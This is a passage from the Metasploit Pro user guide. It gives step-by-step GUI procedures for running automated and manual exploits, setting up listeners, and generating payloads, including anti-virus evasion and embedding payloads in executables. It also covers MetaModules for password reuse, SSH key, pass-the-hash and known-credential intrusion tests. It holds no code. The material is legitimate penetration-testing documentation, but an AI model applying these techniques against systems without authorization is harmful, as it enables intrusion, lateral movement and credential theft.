6. Click Show Advanced Options and configure any additional options for the bruteforce attack. 7. Under Credential Selection, locate the Imported Credential Files list. Select the credential file, or keyword list, that you want to use. 8. Run the bruteforce attack.
Viewing Imported Credentials

1. Open a project. 2. Click the Overview tab. 3. Click Bruteforce. The Bruteforce window appears. 4. Click Manage Credentials. The Credential Import window appears. 5. Locate the credentials that you want to view and click Download. 6. Save the file to a location on your computer.
Viewing Metasploit Word Lists

The word lists that are available in the following locations:
l
$INSTALL/apps/pro/data/wordlists $INSTALL/apps/msf3/data/john/wordlists $INSTALL/nmap/nselib/data $INSTALL/apps/pro/msf3/data/wordlists
l l
Deleting Imported Word Lists

1. Open a project. 2. Click the Overview tab. 3. Click Bruteforce. The Bruteforce window appears. 4. Click Manage Credentials. The Credential Import window appears. 5. Locate the credentials that you want to view. 6. Click Delete for each file that you want to delete.
Viewing Imported Credentials
233
Chapter 10:
Exploitation
To learn more about exploitation, read the following topics:

l
About Exploitation on page 235 Components of an Exploit on page 237 Common Exploitation Tasks on page 238 Automated Exploits on page 235 Manual Exploits on page 235
About Exploitation
An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. Exploits include buffer overflow, code injection, and web application exploits. Metasploit Pro offers automated exploits and manual exploits. The type of exploit that you use depends on the level of granular control you want over the exploits.
Automated Exploits
When you run an automated exploit, Metasploit Pro builds an attack plan based on the service, operating system, and vulnerability information that it has for the target system. Automated exploits cross reference open ports, imported vulnerabilities, and fingerprint information with exploit modules. The attack plan defines the exploit modules that Metasploit Pro will use to attack the target systems. An automated exploit uses reverse connect or bind listener payloads and does not abuse normal authenticated control mechanisms. To run an automated exploit, you must specify the hosts that you want to exploit and the minimum reliability setting that Metasploit Pro should use. The minimum reliability setting indicates the potential impact that the exploits have on the target system. If you use a high ranking, such as excellent or great, Metasploit Pro uses exploits that will be unlikely to crash the service or system. Exploits that typically have a high reliability ranking include SQL injection exploits, web application exploits, and command execution exploits. Exploits that corrupt memory will most likely not have a high reliability ranking. You can also specify the payload type that you want the exploit to use. By default, automated exploits use Meterpreter, but you can choose to use a command shell instead.
Manual Exploits
A manual exploit is a module that you can select and run individually. You perform a manual exploit when you want to exploit a known vulnerability. You choose the exploit module based on the information you have about the host. For example, if you know that the host runs Windows Service Pack 1, you can run an exploit that targets Windows Service Pack 1 vulnerabilities. Or if you know that the target system has a specific vulnerability that you want to test, you can run the exploit that targets that particular weakness.
About Exploitation
235
Manual exploitation provides granular control over the module and evasion options that an exploit uses. Whereas automated exploits enable you to run simultaneously multiple exploits, manual exploits enable you to run one exploit at a time. The options and instructions that you perform for manual exploits vary based on the exploit that you choose to run. Therefore, use the following instructions as a guideline to manually run exploits.
Manual Exploits Workflow Overview

The following steps provide an overview of the steps you need to take to manually exploit targets: 1. Create a list of system targets. 2. Create a map of all available exploits using references, ports, and service names. 3. Create a match table of exploits for systems, but do not include devices that are fragile or devices that cannot be exploited. 4. Create a prioritized queue of exploit modules based on reliability and interleave exploits between hosts. 5. Execute exploit modules until Metasploit Pro obtains a session.
Manual Exploits
236
Components of an Exploit
The following sections describe the different components that make up an exploit.
Module
A module is a prepackaged collection of code that performs a specific task, such as run a Nmap scan or a particular exploit.
Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. There are a couple of types of payloads: reverse shell and bind shell. The major difference between a reverse shell and a bind shell is how the shell enables you to connect to the exploited system. A reverse shell creates a connection from the target machine back to you as a command prompt. A bind shell, on the other hand, attaches a command prompt to a listening port on the exploited system. You can connect to the bind shell to access the exploited system.
Listeners
After an exploit successfully compromises a target system, Metasploit Pro uses a listener to wait for an incoming connection from the exploited system. The listener is the component that handles persistent agents from exploited systems. When you create a listener, you associate the listener to a specific project. Therefore, when an exploited target makes a connection with the listener, you see an active session open in the project. Note: You can create global listeners that you can use across multiple projects. However, only one project can use the listener at a time. You assign a post-exploitation macro to each listener. When the exploited system makes a connection with the attacking system, Metasploit Pro launches the post-exploitation macro. Listeners stop after you delete a project or you manually stop a listener.
Components of an Exploit
237
Common Exploitation Tasks

The following sections describe the most commonly performed exploitation tasks. Searching for Exploits Setting Up a Listener Running a Single Exploit Running Automated Exploitation Enabling or Disabling a Listener Stopping a Listener
Searching for Exploits

The module search engine searches the module database for the keyword expression and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target system. 1. From within a project, click the Modules tab. 2. In the Search Modules field, enter a keyword expression to search for a specific exploit. 3. Use the keyword tags to define the keyword expression. 4. Press Enter to perform the search.
Running Automated Exploits

1. From within a project, click the Analysis tab. 2. When the Hosts window appears, select the hosts that you want to exploit. 3. Click Exploit. 4. When the New Automated Exploitation Attempt window appears, verify that target address field contains the addresses that you want to exploit. 5. Select the minimum reliability for the exploit. 6. Click Show Advanced Options. 7. Define the target hosts that you want to include or exclude from the exploit. 8. Define the payload options. This determines the type of payload the exploit uses, the type of connection the payload creates, and the listener ports that the exploit uses.
Common Exploitation Tasks
238
9. Define the exploit selection options. This determines the ports that the exploit includes and excludes from the attack. 10. Define the advanced options. The advanced options lets you define the number of exploits you can run concurrently, the time out for each exploit, and evasion options. 11. Run the exploit.
Running a Single Exploit

1. From within a project, click the Modules tab. 2. Use the search engine to find a specific module. 3. Use the keyword tags to define the search term. 4. Click on a module name to select the module. 5. When the Module window appears, define the target hosts that you want to include or exclude from the exploit. 6. Define the payload options, if the options are available. 7. Define the module options. Note: Module options vary between modules. Use the in-product help to view descriptions for each option. 8. Define the advanced options. Note: Advanced options vary between modules. Use the in-product help to view descriptions for each option. 9. Define the evasion options. Note: Evasion options vary between modules. Use the in-product help to view descriptions for each option. 10. Launch the exploit.
Setting Up a Listener
1. Select Administration > Global Settings from the main menu. 2. Click New Listener, which is located under Persistent Listeners. 3. When the Create a Listener window appears, choose an associated project for the listener. 4. Define the listener payload type. 5. Enter an IP address for the listener.
Running a Single Exploit
239
6. Enter a port for the listener. 7. Choose a post-exploitation macro to deploy after the listener connects to the target system. Enable the listener. 8. Save the listener.
Enabling and Disabling a Listener

1. Select Administration > Global Settings from the main menu. 2. When the Global Settings window appears, click on a listener from the Scope column. 3. Select or deselect the Enabled option. 4. Update the listener.
Stopping a Listener
To stop a listener, you can either delete the listener from the system or you can stop the listener from the Task screen. 1. From within a project, click the Tasks tab. 2. Find the listening tasks. 3. Click the Stop button in the Timestamp/Duration column.
Enabling and Disabling a Listener
240
Chapter 11:
Payloads
To learn more about payloads, read the following topics:

l
The Payload Generator on page 242
The Payload Generator

The Payload Generator enables you to create a properly formatted executable that you can use to deliver shellcode to a target system without the use of an exploit. The Payload Generator provides a guided interface that walks you through the process of generating a dynamic payload or a classic payload. Depending on the type of payload you choose to build, it will display the applicable options that you can use to customize the payload.
You use the payload generator when you need to build a standalone binary file that delivers a custom-built payload. Binary files, such as .exe and .bin files, are typically delivered through client-side exploits, such as phishing e-mails or social engineering attacks, which means that you will probably need to be able to bypass anti-virus detection to execute the shellcode on the target system. To help reduce anti-virus detection, the Payload Generator enables you to do things like encode the payload and use a dynamic executable. Payloads are generated globally, outside the context of a project. This means that payloads are generated on the fly, can only be downloaded once, and are not tied to a particular project. They are useful when you need to quickly generate a executable payload for a single use.
242
Accessing the Payload Generator

You access the Payload Generator from the Global Tools area of the web interface. To access the Payload Generator, go to the Projects List. Find the Global Tools area and click on the PayloadGenerator widget to launch it.
Building Dynamic Payloads

The Payload Generator enables you to build a Windows executable that uses a dynamic stager that is written entirely in randomized C code. The dynamic stager does not use an executable template or shellcode, which allows it to behave similarly to a standard Windows application. The resulting executable it is different each time it is generated, so that anti-virus software will not be able to identify the stager as Metasploit shellcode. Note: Metasploit Pro offers dynamic payloads for Windows platforms only. These payloads are compatible with any Windows x86 and x86_64 system.
Dynamic Payload Options

You can use the following common options to build a dynamic payload: Option Description Specifies the type of payload that the exploit will deliver to the target. Choose one of the following payload types: Type of Payload
l
Command - A command execution payload that enables you to execute commands on the remote machine.
Accessing the Payload Generator
243
Option
l
Description Meterpreter - An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.
Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. Choose one of the following stagers: Stager
l
Reverse TCP - Creates a connection from the target machine back to the Metasploit server over TCP. Bind TCP - Binds a command prompt to a listening port on the target machine so that the Metasploit server can connect to it. Reverse HTTP - Creates a connection from the target machine back to the Metasploit server over HTTP. Reverse HTTPS - Creates a connection from the target machine back to the Metasploit server over HTTPS.
Stage LHOST LPORT RHOST
Specifies the payload that is delivered by the stager. Defines the IP address the payload connects back to. (Reverse connections only) Defines the port the payload connects back to. Defines the port that the listener binds to. (Bind connections only)
Generating Dynamic Payloads

1. From the Projects page, launch the Payload Generator.
244
2. Select the DynamicPayload option.
3. Click the Stager dropdown and choose one of the following: Reverse TCP, Bind TCP, ReverseHTTP, or Reverse HTTPS.
4. Click the Stage dropdown and choose the stage you want the stager to download.
The list will display applicable stages for the stager you have selected. 5. Enter the IP address that you want to the payload to connect back to in the LHOST field. (Reverse connections only) 6. Enter the port that you want the payload to connect back to in the LPORT field. 7. Enter the port that you want the listener to bind to in the RHOST field. (Bind connections only) 8. Click Generate. If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically download the executable.
245
If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the executable to your computer.
Building Classic Payloads

A classic payload is built the traditional way--from scratch. The Payload Generator is particularly useful when you need to build a payload in various formats and encode them with different encoder modules. You can build a variety of payloads based on the operating system, architecture, type of connection, and output format that you need for a particular host.
Classic Payload Options

The following table describes the most common options that are available for classic payloads: Option Specifies the platform. Platform The following platforms are supported: AIX, Android, BSD, BSDi, Firefox, Java, Linux, Netware, NodeJS, OSX, PHP, Platform, Python, Ruby, Solaris, Unix, and Windows. Specifies the processor architecture. The Payload Generator shows you the options that are available for the architecture you have selected. The following architectures are supported:
l
Description
AIX Android BSD sparc and x86 BSDi Firefox Java Linux armle, cbea. cbea64, java, mipsbe, mipsle, ppc, ppc64, x86, and x86_64 Netware NodeJS OSX armle, java, ppc, x86, and x86_64 PHP armbe, armle, cbea. cbea64, cmd, dalvik, firefox, java, mips, mipsbe, mipsle, nodejs, php, ppc, ppc64, python, ruby, sparc, x86, and x86_64
Architecture
246
Option
l
Description Solaris java, sparc, and x86 Unix cmd, java, and tty Windows cmd, java, x86, and x86_64
Specifies the type of payload that the exploit will deliver to the target. Payload The Payload Generator shows you the payloads that are available for the platform you have selected. Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. Stager The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. The list of stagers that are available will vary based on the platform and architecture that you have selected. Specifies the function to call when a payload completes so that it can safely exit a thread. Choose one of the following exit functions:
l
Exit Function
l
Thread - Calls the ExitThread API function. Process - Calls the ExitProcess API function. SEH - Restarts the thread when an error occurs. None - Enables the thread to continue executing so that you can serially run multiple payloads together.
Listener Host Listener Port Added Shellcode
Defines the IP address that you want the target host to connect back to. Defines the port that you want to use for reverse connections. Enables you to specify an additional the shellcode file that will run in a separate, parallel thread while the main thread executes the payload. Defines the length of the NOP sled you want to prepend to the payload.
Size of NOP Sled Each NOP you add to the payload adds 1 byte to the total payload size.
Note: The options that are available for a payload vary based on its architecture, platform. and payload type.
247
Encoding the Payload

An encoder enables you to eliminate bad characters from a payload so that you can use it with a particular exploit. A character is considered to be bad if some aspect of the exploit makes it impossible to use. For example, many applications interpret a null byte as the end of a string. If it appears anywhere in the payload, the shellcode will terminate before it completes and cause the payload to fail. In this particular case, you can apply an encoder that removes null bytes from the payload. An encoder does not guarantee that a payload will evade anti-virus detection, but it will ensure a payload does not contain bad characters that can cause issues with an exploit or produce unintended results. The following are examples of common bad characters:
l
Spaces Carriage returns Line feeds Tabs Null bytes
There are many different encoders that are available in the Metasploit Framework, which can be used for various situations. For example, some encoders, such as alpha_mixed and alpha_lower, can be used to replace characters with all alphanumeric characters, which can be useful for applications that only accept text-based characters as input. Other encoders, such as the very reliable and highly ranked shikata_ga_nai, are polymorphic XOR encoders that use an XOR encrypting scheme to help evade detection. Encoding options are only available for the following platforms:
l
AIX BSD sparc BSD x86 BSDi Linux mipsbe Linux mipsle Linux ppc Linux x86
Linux x86_64 Netware OSX ppc OSX x86 OSX x86_64 PHP Platform sparc Platform x86
Platform x86_64 Python cmd Solaris sparc Solaris x86 Unix cmd Windows cmd Windows x86 Windows x86_64
248
Encoding Options
You can use the following options to encode a payload: Option Description Sets the encoder that is used to encode the payload. Encoder The Payload Generator only displays the encoders that are applicable to the platform and architecture you have selected. Specifies the number of times that you want to encode the payload. Number of Iterations The more times you encode a payload, the larger the payload becomes. You may need to modify the number of iterations if it causes the payload to exceed the maximum payload size. Defines the maximum size of the resulting payload in bytes. The maximum size takes precedence over the encoding iterations. If the encoder Maximum Size of Payload causes the payload to exceed the maximum size you have specified, the Payload Generator will display an error message. To fix the error, you can select a new encoder, modify the number of iterations, or set a different maximum payload size. Specifies the list of characters that you do not want to appear in the payload, such as spaces, carriage returns, line feeds, tabs, and null bytes. Bad Characters You must enter the values in hex. You can copy and paste the hex characters into the text box. The text editor will attempt to format the hex
Output Options
You can use the following options to create the binary file: Option Format Choose from the following formats: executable, raw bytes, or shellcode buffer. Enables you to inject the payload into an existing executable and retain the original Preserve original functionality of executable functionality of the original executable. The resulting executable will function like the original one. You should only enable this option only if you have uploaded a template file. Description Specifies the format to use to output the payload.
249
Option
Description Specifies the executable template that you want to use to run in the main thread. For
Template file
example, you can embed the payload in an executable, like calc.exe. When the executable runs, it creates a separate thread for the payload that runs in the background and continues to run calc.exe in the main thread.
Generating a Classic Payload

The configuration of a classic payload will vary based on the platform, architecture, payload, stager, and stage that you have selected. The following instructions will provide an overview of the steps that you need to perform to generate a classic payload--such as a Linux Meterpreter Reverse TCP payload. 1. From the Projects page, launch the Payload Generator.
2. Select the Classic Payload option.
3. Click the Platform dropdown button and choose one of the available platforms.
For a list of supported platforms, see Classic Payload Options on page 246. 4. Click the Architecture dropdown button and select one of the available processor architecture types.
250
The list of architecture types will vary based on the platform that you have selected. Some platforms, such as Android and AIX, will not have a platform. From this point on, the steps will vary depending on the platform, architecture, and payload you have selected. Generally, you will need to specify the LHOST (reverse), LPORT, and RHOST (bind) that the payload uses, as well as the output options for the executable. You can also do things like encode the payload. For more information on payload options, see Classic Payload Options on page 246. For more information on output options, see Output Options on page 249. For more information on encoding options, see
Encoding Options on page 249.

When you are ready to build the payload, click the Generate button. The Generate button will be active if all required options for the payload are configured.
If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically start the download process. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the payload to your computer.
251
Listeners
A listener is the component that waits for an incoming connection from an exploited system. You must set up a listener if you intend to establish a connection between your Metasploit server and the exploited machine. For example, if you have delivered an executable to a target host, you will need to set up a listener to wait for a connection from it. When the host connects to the listener, a session opens on their machine, which will enable you to interact with it to do things like collect evidence from their system. In Metasploit Pro, you can set up persistent listeners, which will continuously listen for connect backs from a compromised host. You can set up a persistent listener from the Global Settings area of the web interface. Each listener is bound to a specific project. To set up a listener, you will need to define the listening host, listening port, and payload type. You can also assign a post-exploitation macro to the listener, so that when the exploited system makes a connects back to the listener, Metasploit Pro runs the macro.
Setting Up a Listener
1. Select Administration > Global Settings. 2. Find the Persistent Listeners section. 3. Click the New Listener button. 4. When the Create a Listener form appears, specify the following:
l
Associated project - Choose the project you want to use to access and manage open sessions. Listener payload - Choose the appropriate payload for the listener. Listener Address - Specify the IP address that you want the payload to connect back to (e.g., the IP address of the Metasploit server). Listener Port - Specify the port you set up for the handler when you generated the Windows Meterpreter Reverse TCP payload (e.g., 4444).
5. Save the listener.
Listeners
252
Chapter 12:
MetaModules
To learn more about MetaModules, read the following topics:

l
About MetaModules on page 254 Segmentation and Firewall Testing MetaModule on page 280 Known Credentials Intrusion MetaModule on page 276 Passive Network Discovery MetaModule on page 284 Pass the HashMetaModule on page 271 Single Password Testing MetaModule on page 261 SSH Key Testing MetaModule on page 267
About MetaModules
AMetaModule is a Metasploit Pro feature that provides a guided interface to walk you through a singular penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing or passive network discovery, but enables you to quickly configure and run the module with minimal set up. Traditionally, in Metasploit Pro, there is a quite a bit of manual configuration that you have to do in order to perform certain tasks. It requires knowledge of the various modules that are available in the Metasploit Framework and an understanding of how to configure and use them. This process can be daunting. This is where MetaModules come into the picture. The best way to think of a MetaModule is to think of them as modules with wizards. Like regular modules, they are prepackaged mini programs that you can run to perform a specific task, such as bruteforcing or scanning a target. Unlike modules, MetaModules guide you through its configuration. For example, most MetaModules need you to define the target scope, set up the test options, and generate a report. MetaModules are added and updated to Metasploit Pro regularly, so you should always grab the latest software update to get the newest MetaModules. To see all the latest MetaModules, select Modules > MetaModules from the Main Menu.
About MetaModules
254
Tour of the MetaModules Overview Page
MetaModule Runs
Select Modules > MetaModules from the Main Menu. When the Overview pages appears, click the View All button. The MetaModule Runs page appears.
Tour of the MetaModules Overview Page
255
From the MetaModules Runs page, you can view the findings for a MetaModule and delete a MetaModule run from the project.
MetaModule Findings
After you launch a MetaModule run, the Findings window appears and shows you the real time statistics and the events for the MetaModule run.
The Findings window shows the following data:

l
Statistics - Shows real-time statistics for the MetaModule run. The information that the Findings window varies based on the MetaModule that is running. Task Log - Shows a detailed log of events for a MetaModule run.
You can click on the Statistics tab or the Task Log tab to switch between views on the Findings window.
MetaModule Findings
After a MetaModule completes its run, you can view the findings for the test from the MetaModule Runs page. The findings vary based on the MetaModule you choose to view. The following list describes the information that each MetaModule reports on the Findings window.
l
Firewall Egress Test Findings - Shows the total number of open ports, closed ports, and filtered ports. Passive Network DiscoveryFindings - Shows the number of total packets captured, data captured, and hosts that were identified. Known Credentials Intrusion Findings - Shows the total number of hosts that the MetaModule attempted to authenticate and the number of sessions it was able to open. Pass the Hash Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
MetaModule Findings
256
Single Password Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins. SSH Key Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
Viewing the Findings for a MetaModule Run

To view the findings for a MetaModule run: 1. From within a project, select Modules > MetaModules.
2. Click on the View All Recently Launched MetaModules button.
3. Find the MetaModule run that you want to view the findings for. 4. Click Findings. The Findings window appears and shows you the results from the MetaModule run.
MetaModule Last Run Stats

Metasploit Pro displays the findings for the last MetaModule run at the top of the MetaModules Overview page.
MetaModule Findings
257
To view the last run stats, select Modules >MetaModules from the Main Menu. The Overview Page appears and shows the last run stats at the top of the page.
Stopping a MetaModule Run

You can stop a MetaModule Run at any time. If you stop a MetaModule run before it finishes, it will not generate the report. However, any partial findings will be stored in the project. You can view the partial results from the Findings window. 1. SelectModules > MetaModules from the MainMenu. 2. Click the View All button to go to the MetaModules Run page.
MetaModule Findings
258
3. Find the MetaModule Run that you want to stop. It must have a Running status. 4. Click Stop. The status changes from Running to Aborted.
Deleting a MetaModule Run

Before you can delete a MetaModule run, you must have at least run one MetaModule. When you delete a MetaModule run, it removes the task from the MetaModule Runs page. It does not delete the sessions 1. From within a project, select Modules > MetaModules.
2. Click on the View All Recently Launched MetaModules button.
3. Find the MetaModule Run you want to delete. 4. Click Delete.
259
260
Single Password Testing MetaModule

The Single Password Testing MetaModule recycles a known credential pair to identify additional systems that can be authenticated. You can run this MetaModule to demonstrate how password reuse could expose major weaknesses in an enterprises security posture. A single cracked password can enable you to easily compromise other systems that share the same password. To use the Single Password Testing MetaModule, you need to provide it with a known credential pair that youve uncovered through a scan, bruteforce attack, or phishing attack. When you configure this MetaModule, you need to define the target hosts and the services that you want to attempt to authenticate. After the MetaModule completes its run, it generates a report that details the hosts on which it was able to authenticate the credentials.
Lockout Risks
An account lockout disables an account and prevents you from accessing the account for the duration of the lockout period. When you configure the Single Password Testing MetaModule, you should factor in the lockout risk for the services that you choose. Each service is categorized into the following lockout risks:
l
Low Risk - Any service that typically does not enforce account lockouts, such as AFP, DB2, EXEC, FTP, HTTP, HTTPS, LOGIN, Oracle, Postgres, SHELL, SNMP, SSH_PUBKEY, Telnet, and VNC. Medium Risk - Any service that typically enforces account lockouts, such as MSSQL, MySQL, POP3, and SSH. High Risk - Any service that uses Windows authentication, such as PC Anywhere, SMB, vmauthd, and WinRM.
Running the Single Password Testing MetaModule

1. From within a project, select Modules > MetaModules.
Single Password Testing MetaModule
261
2. Find the Single Password Testing MetaModule and click the Launch button. The Single Password Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test. The target address range must match the hosts in the workspace.
262
4. Click on the Services and Ports tab. The Services form appears.
5. Select the services that you want to attempt to authenticate. All services are categorized based on their lockout risk, which is the likelihood that the service enforces account lockouts. 6. Click on the Credentials tab. The Credentials form appears. 7. You can choose one of the following options to supply the MetaModule with credentials:
263
Enter a known credential pair - You need to manually enter the user name and password combination that you want the MetaModule to use. Use this method for credentials obtained from phishing attacks. Choose an existing credential pair - You can select the user name and password combination from a list of known credentials. These credentials were obtained from a bruteforce attack, discovery scan, or data import.
8. Click the Report tab. The Report configuration form appears.
264
9. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name. 10. Select PDF, Word, RTF, or HTML for the report format. 11. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted
265
to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab. After the MetaModule completes its run, you should go the Reports area to view the Single Password Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of authenticated services and hosts. For a more detailed look at the compromised hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
266
SSH Key Testing MetaModule

SSH public key authentication provides a secure method of logging in to a remote host. It uses an SSH key pair to authenticate a login instead of the traditional user name and password combination. The SSH key pair consists of a private and public SSH key. The private SSH key is stored on the local machine and enables you to log in to remote systems on which the corresponding public key is installed. If you obtain an unencrypted SSH private key from a compromised target machine, you can run the SSH Key Testing MetaModule. This MetaModule enables you to bruteforce logins on a range of hosts to identify remote machines that can be authenticated with the private key. During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted, the number of login attempts made, and the number of successful logins. After the MetaModule completes its run, it generates a complete report that provides the details for the hosts it was able to successfully authenticate.
Running the SSH KeyTesting MetaModule

Before you can run the SSH Key Testing MetaModule, you must either have a SSH private key available that you can upload to your project or your project must contain a looted SSH private key obtained from a scan, a bruteforce attack, or some other exploit method. 1. From within a project, select Modules > MetaModules.
267
2. Find the SSH Key Testing MetaModule and click the Launch button. The SSH Key Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
4. Click on the Credentials tab. The Credentials form appears. 5. Choose one of the following options to supply the MetaModule with an SSH private key:
268
Enter a known credential pair- You need to manually enter the user name, and then browse to the location of the private key that you want the MetaModule to use. Choose an existing SSH key - You can select a user name and SSH key from a list of looted keys. These keys were obtained from a bruteforce attack, discovery scan, data import, or exploited system.
6. Click the Report tab. The Report configuration form appears. 7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
269
9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 11. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, you should go the Reports area to view the SSH Key Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
270
Pass the HashMetaModule

Pass the hash is an attack method that attempts to use a looted password hash to authenticate to a remote system. It enables you to use a raw hash, which means that you do not need to decrypt the hash or know the plain text password. This attack method makes it very easy to compromise other machines that share the same credentials. If you are able to obtain an NTLM password hash during your penetration test, you can run the Pass the Hash MetaModule. It attempts to use the Windows file and print sharing service, which operates over a protocol known as Server Message Block (SMB), to authenticate to other hosts in the network. In order to run the Pass the Hash MetaModule, you must have a looted credential pair that consists of a raw NTLM hash and the associated user name. A password hash can be obtained from a compromised host by running evidence collection, by manually browsing a file system to locate the Security Accounts Manager (SAM), or by dumping the password hashes. Once you have a valid credential pair, you only need to specify the target hosts that you want the MetaModule test the credentials against. During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted, the number of login attempts made, and the number of successful logins. You can quickly identify the hosts that share the same login as the host from which you obtained the NTLM hash. You can leverage this information to move laterally across the network or to escalate your privileges to gain access to higher value machines. When the MetaModule completes its run, it generates a complete report that provides the details for the hosts it was able to successfully authenticate. You can share this report with your organization to expose weak and shared passwords and to help mitigate vulnerabilities in its security infrastructure.
Running the Pass the Hash MetaModule

Before you can run the Pass the Hash MetaModule, you must either have a raw NTLM hash that you can manually input for the test or your project must contain an NTLM hash looted from a compromised system. 1. From within a project, select Modules > MetaModules.
Pass the HashMetaModule
271
2. Find the Pass the Hash MetaModule and click the Launch button. The Pass the Hash window appears.
3. From the Scope tab, enter the target address range you want to use for the test in the Address Range field.
4. If there are any hosts that you want to blacklist from the test, click on the Advanced dropdown link and enter the addresses for those hosts in the Excluded Addresses field. 5. Click on the Credentials tab. The Credentials configuration form appears. 6. Choose one of the following options to supply the MetaModule with a raw NTLM hash:
272
Enter a known credential pair - You need to manually enter the user name, and then enter the raw hash that you want the MetaModule to use. You should leave WORKGROUP as the domain name in order to authenticate to the local machine. Choose an existing SMB hash - You can select a user name and hash from a list of looted password hashes that are stored in the project.
7. Click the Generate Report tab. The Report configuration form appears.
273
8. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
274
11. From the Options area, select the Mask discovered passwords option if you want to obscure any password hashes that the report contains.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, you should go the Reports area to view the Pass the Hash Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
275
Known Credentials Intrusion MetaModule

The Known Credentials Intrusion MetaModule logs in to a list of specified services and attempts to open sessions on a range of hosts with the known credentials in the project. You can run this MetaModule if you want to quickly get shells on the hosts in your project. In order to run the Known Credentials Intrusion MetaModule, the project must already contain credentials that you have either collected from a Discovery Scan, bruteforce attack, or data import. The Known Credentials Intrusion MetaModule will attempt to authenticate to each service that has been enumerated for each host. If the MetaModule is able to successfully log in to the service, it attempts to open a session on the target, which you can use to do things like set up a VPN pivot, collect system data, or launch a shell to interact with the target system. It opens one session per target, and it will move onto the next host in the test if a session has already been established for a host. During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted and the number of sessions opened. When the MetaModule completes its run, it generates a complete report that provides the details for the hosts on which it was able to open a session. You can share this report with your organization to expose weak passwords and to help mitigate vulnerabilities in its security infrastructure.
Running the Known Credentials Intrusion MetaModule

Before you can run the Known Credentials Intrusion MetaModule, you must run a Discovery Scan on the target network range or import existing host data. This populates the project with the necessary host information, such as open ports and services, that the MetaModule needs to run. 1. From within a project, select Modules > MetaModules.
276
2. Find the Known Credentials Intrusion MetaModule and click the Launch button. The Known Credentials Intrusion window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
277
4. Click on the Payload tab to configure the payload settings.
5. Specify the following settings that you want to use for the payload:
l
Payload type - Choose Meterpreter for Windows or Command shell for Linux systems. Connection - Choose one of the following connection types: Auto - Automatically selects the payload type. In most cases, the Auto option selects the reverse shell payload because it is more likely to establish a connection between a target machine and the attacking machine. Reverse - Select this option if the targets are behind a firewall or use NAT. Typically, a reverse shell payload will work for most situations. Bind - Select this option if the target devices are unable to initiate a connection.
278
Listener Ports - The port that you want the listener to listen on for incoming connections. By default, ports 1024-65535 are selected; however, you can define a specific port that you want the listener to use, such as 4444. Listener Host - The IP address that you want the target machine to connect back to. This is typically going to be the IP address of your local machine. If you do not specify a listener host, the MetaModule automatically uses the IP address of your local machine.
6. Click the Generate Report tab. The Report configuration form appears. 7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
